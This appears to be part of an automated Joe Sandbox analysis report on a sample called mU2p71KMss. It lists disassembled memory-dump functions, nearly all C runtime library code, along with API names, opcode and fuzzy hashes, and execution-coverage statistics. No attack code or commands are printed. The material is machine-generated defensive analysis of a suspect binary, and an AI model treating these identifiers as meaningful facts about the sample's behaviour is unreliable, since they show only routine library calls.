                                                                                                  • __gmtime64_s.LIBCMT ref: 05DF4020
                                                                                                  • __gmtime64_s.LIBCMT ref: 05DF403D
                                                                                                  • __allrem.LIBCMT ref: 05DF4093
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DF40AF
                                                                                                  • __allrem.LIBCMT ref: 05DF40C6
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DF40E4
                                                                                                  • __allrem.LIBCMT ref: 05DF40FB
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DF4119
                                                                                                  • __invoke_watson.LIBCMT ref: 05DF418A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 384356119-0
                                                                                                  • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction ID: 7de5515488999a0f605b7696cfb69379a3728b1260caee60c870b281f4091612
                                                                                                  • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction Fuzzy Hash: F371D671B01716BBEB249E69CC44B6BB3B9FF10264F16462BEA54D6680E770DA808790
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DF650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 3432600739-0
                                                                                                  • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                  • Instruction ID: 5e404ed1550e3ace9211abaa7ad648af1c3f8b1efb14e2aa37263391254df047
                                                                                                  • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                  • Instruction Fuzzy Hash: 3F411532A04304AFDB00AFA4ED48B9E3BE5FF04314F12846FEB1496690DB76D645DB25
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DF84AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 744 5df84ab-5df84d9 call 5df8477 749 5df84db-5df84de 744->749 750 5df84f3-5df850b call 5df158d 744->750 752 5df84ed 749->752 753 5df84e0-5df84eb call 5df158d 749->753 756 5df850d-5df850f 750->756 757 5df8524-5df855a call 5df158d * 3 750->757 752->750 753->749 753->752 759 5df851e 756->759 760 5df8511-5df851c call 5df158d 756->760 769 5df855c-5df8562 757->769 770 5df856b-5df857e 757->770 759->757 760->756 760->759 769->770 771 5df8564-5df856a call 5df158d 769->771 775 5df858d-5df8594 770->775 776 5df8580-5df8587 call 5df158d 770->776 771->770 778 5df8596-5df859d call 5df158d 775->778 779 5df85a3-5df85ae 775->779 776->775 778->779 782 5df85cb-5df85cd 779->782 783 5df85b0-5df85bc 779->783 783->782 784 5df85be-5df85c5 call 5df158d 783->784 784->782
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ExitProcess___crt
                                                                                                  • String ID:
                                                                                                  • API String ID: 1022109855-0
                                                                                                  • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                  • Instruction ID: e88781716faf56be41e6af26ee681ced89ded916bc7e2fe266b06208f3079ec8
                                                                                                  • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                  • Instruction Fuzzy Hash: 7131B131A00250DBCB21AF54FC8885977B4FB14330746862BEB06573A0CBB459CDEFA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E1FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 05E1FC1F
                                                                                                    • Part of subcall function 05E0169C: std::exception::_Copy_str.LIBCMT ref: 05E016B5
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E1FC34
                                                                                                  • std::exception::exception.LIBCMT ref: 05E1FC4D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E1FC62
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 05E1FC74
                                                                                                    • Part of subcall function 05E1F914: std::exception::exception.LIBCMT ref: 05E1F92E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E1FC82
                                                                                                  • std::exception::exception.LIBCMT ref: 05E1FC9B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E1FCB0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: leM
                                                                                                  • API String ID: 3569886845-2926266777
                                                                                                  • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction ID: ab0dce7edc6f4d2bcd60e0b2ae02f9648d309c394bd3b3b3669f7a759ae4b3dd
                                                                                                  • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction Fuzzy Hash: 9F11FE79D0020DBBCF04FFA5E859CDDBB7CAA04344F409566AD54AB280EB74E388CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 3721157643-0
                                                                                                  • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction ID: 13b768c1280a9337e8751030d89c077c228639b8877b0a3e5b98611d79915575
                                                                                                  • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction Fuzzy Hash: 4511E7B67405546AC26167F59C15FFF7AECDF46711F09006BFB8DD2180DA185A0493B2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DE1960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 65388428-0
                                                                                                  • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                  • Instruction ID: c2e7b81a522a980d0532425d4008bb849ce071f653afab51b45235319a4127e9
                                                                                                  • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                  • Instruction Fuzzy Hash: E2510B71E40219ABDB11EBE5DC8AFEFBBB8FB04744F140026FA05B6190E7745A05CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 217217746-0
                                                                                                  • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                  • Instruction ID: d567bc77c1af82fa88392436c20166774b25e8cb5a8a77d0c8e6aed807cad570
                                                                                                  • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                  • Instruction Fuzzy Hash: B85140B1E4020AAADF11DFA1DC46FEEBBB9FB05704F104026F906B6180D775AA05CBB5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 217217746-0
                                                                                                  • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction ID: 071e4257bc784185cb25e2545240aa414108f1db3e96858c4f7bb9b2e23e6b38
                                                                                                  • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction Fuzzy Hash: 62514071E40209AADF15DFA1DC85FFEBBB9FB04744F10012AF906B7180E674AA058BB5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E1208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3534693527-0
                                                                                                  • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction ID: c22b1ee6395c3b76954d0a9eef23ed8fd4ed0f1aeccaa3ac51b05803e715708f
                                                                                                  • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction Fuzzy Hash: CB315B36B043116BEB21AF76DC04BAE3754EF05B68F165112EF46DF280DB74890083B9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E966D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 05E966DD
                                                                                                    • Part of subcall function 05DF59BF: __calloc_crt.LIBCMT ref: 05DF59E2
                                                                                                    • Part of subcall function 05DF59BF: __initptd.LIBCMT ref: 05DF5A04
                                                                                                  • __calloc_crt.LIBCMT ref: 05E96700
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 05E9671E
                                                                                                  • __invoke_watson.LIBCMT ref: 05E9673B
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 05E9676D
                                                                                                  • __invoke_watson.LIBCMT ref: 05E9678B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                  • String ID:
                                                                                                  • API String ID: 4066021419-0
                                                                                                  • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction ID: 1fec9a1761d762992e0b131a9d36dbb0d04c30d38429edd9656baa809bebc208
                                                                                                  • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction Fuzzy Hash: 6111C1367042186BFF296B259C04EBB739DEF006A8F021427FE88EA241E721DD0043E4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DE2670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: D
                                                                                                  • API String ID: 2102423945-2746444292
                                                                                                  • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                  • Instruction ID: ec8277efa732cc09819857d5cdae6b7a3e37bf67966dba7dd63488451dd868e6
                                                                                                  • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                  • Instruction Fuzzy Hash: 64E16E75D40219EBDF24EBA0CD89FEEB7BCBF04304F14406AE509A6190EB74AA45CF64
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDD8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: $$$(
                                                                                                  • API String ID: 2102423945-3551151888
                                                                                                  • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                  • Instruction ID: 4a2aa44cf91ce9eddc648e3b072d552fe0e8780e72f4c68305a23692dbb0d01a
                                                                                                  • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                  • Instruction Fuzzy Hash: 20919E71D00218EAEF21EFA4CC59BEEBBB5EF05308F14416AD505772C0DBB65A48CB65
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DF5CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnlen
                                                                                                  • String ID: U
                                                                                                  • API String ID: 3628947076-3372436214
                                                                                                  • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction ID: c9d0fdab938489cec948ffb3a31db8ae209554e7e697fc210fc138df30f4a2f1
                                                                                                  • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction Fuzzy Hash: 3921D8326192087AEB00DBA4FC49FBA739DEB45650F524167FB49C6190FA71EA4087A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DEA810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: p2Q
                                                                                                  • API String ID: 2102423945-1521255505
                                                                                                  • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                  • Instruction ID: 984ceb362d95c0ce49f8360e863073572cbb67a2117976e8b0d254fff725bf9a
                                                                                                  • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                  • Instruction Fuzzy Hash: 69F0E578694750A5F7117750FC2A7957E917B31B04F104045D1142E3E1D3FD234C679A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E1FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 05E1FBF1
                                                                                                    • Part of subcall function 05E0169C: std::exception::_Copy_str.LIBCMT ref: 05E016B5
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E1FC06
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                  • String ID: TeM$TeM
                                                                                                  • API String ID: 3662862379-3870166017
                                                                                                  • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction ID: 749fa8b4feedc4093f1804413be87e79373e968ebd723e486d12a33d4e3752de
                                                                                                  • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction Fuzzy Hash: 78D06775D0020DBBCB04EFA5E859CDDBBBCAA04344B009466A954AB281EA74E389CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDD0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 05DF197D: __wfsopen.LIBCMT ref: 05DF1988
                                                                                                  • _fgetws.LIBCMT ref: 05DDD15C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wfsopen_fgetws
                                                                                                  • String ID:
                                                                                                  • API String ID: 853134316-0
                                                                                                  • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                  • Instruction ID: 08670f0e3003e28eaea87e60498eb750eb77404c9e141b2682450f72ba5a3f1b
                                                                                                  • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                  • Instruction Fuzzy Hash: A6917071D00219ABCF21EFA4CD45BAEFBB6FF04304F15052AE955A3240E775AA04CBB5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDD540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$__except_handler4_fprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 1783060780-0
                                                                                                  • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                  • Instruction ID: 36c0fafda607eef209d01a83b1e20d58f941caaa1a3ae45994162c2efb598985
                                                                                                  • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                  • Instruction Fuzzy Hash: 99A17AB1D00258EBEF11EFA4CC49BDEBBB5EF15304F140029D5057B291E7B65A88CBA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DF2AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                  • Instruction ID: 4a10fb98c7b72b75c7a37646fa861fb37a927b728cc4404d498effeb20448add
                                                                                                  • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                  • Instruction Fuzzy Hash: 1551C038A043059BDB24CFA98C846AE77B6FF40325F16832BEE76D62D4D7709950CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E11359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction ID: cf8bccc9b088b48a65d9bda1e5686f15482facb05c2c6dbd4fb5035fdfd75902
                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction Fuzzy Hash: 19017B3280414EFBCF1A5E84DC05CEE3F63BB18254B499415FF9998434D232C5B2EB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E97A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 05E97A4B
                                                                                                    • Part of subcall function 05E98140: ___BuildCatchObjectHelper.LIBCMT ref: 05E98172
                                                                                                    • Part of subcall function 05E98140: ___AdjustPointer.LIBCMT ref: 05E98189
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 05E97A62
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 05E97A74
                                                                                                  • CallCatchBlock.LIBCMT ref: 05E97A98
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction ID: eb38ba561d13aeefb9fe04b331f0eeffc388a203794381d1731dd4738a8dafd3
                                                                                                  • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction Fuzzy Hash: 24016532500108BBDF16AF95CC04EEE3BBAFF49758F009015FE8862120C372E9A1DBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:37%
                                                                                                  Total number of Nodes:805
                                                                                                  Total number of Limit Nodes:91
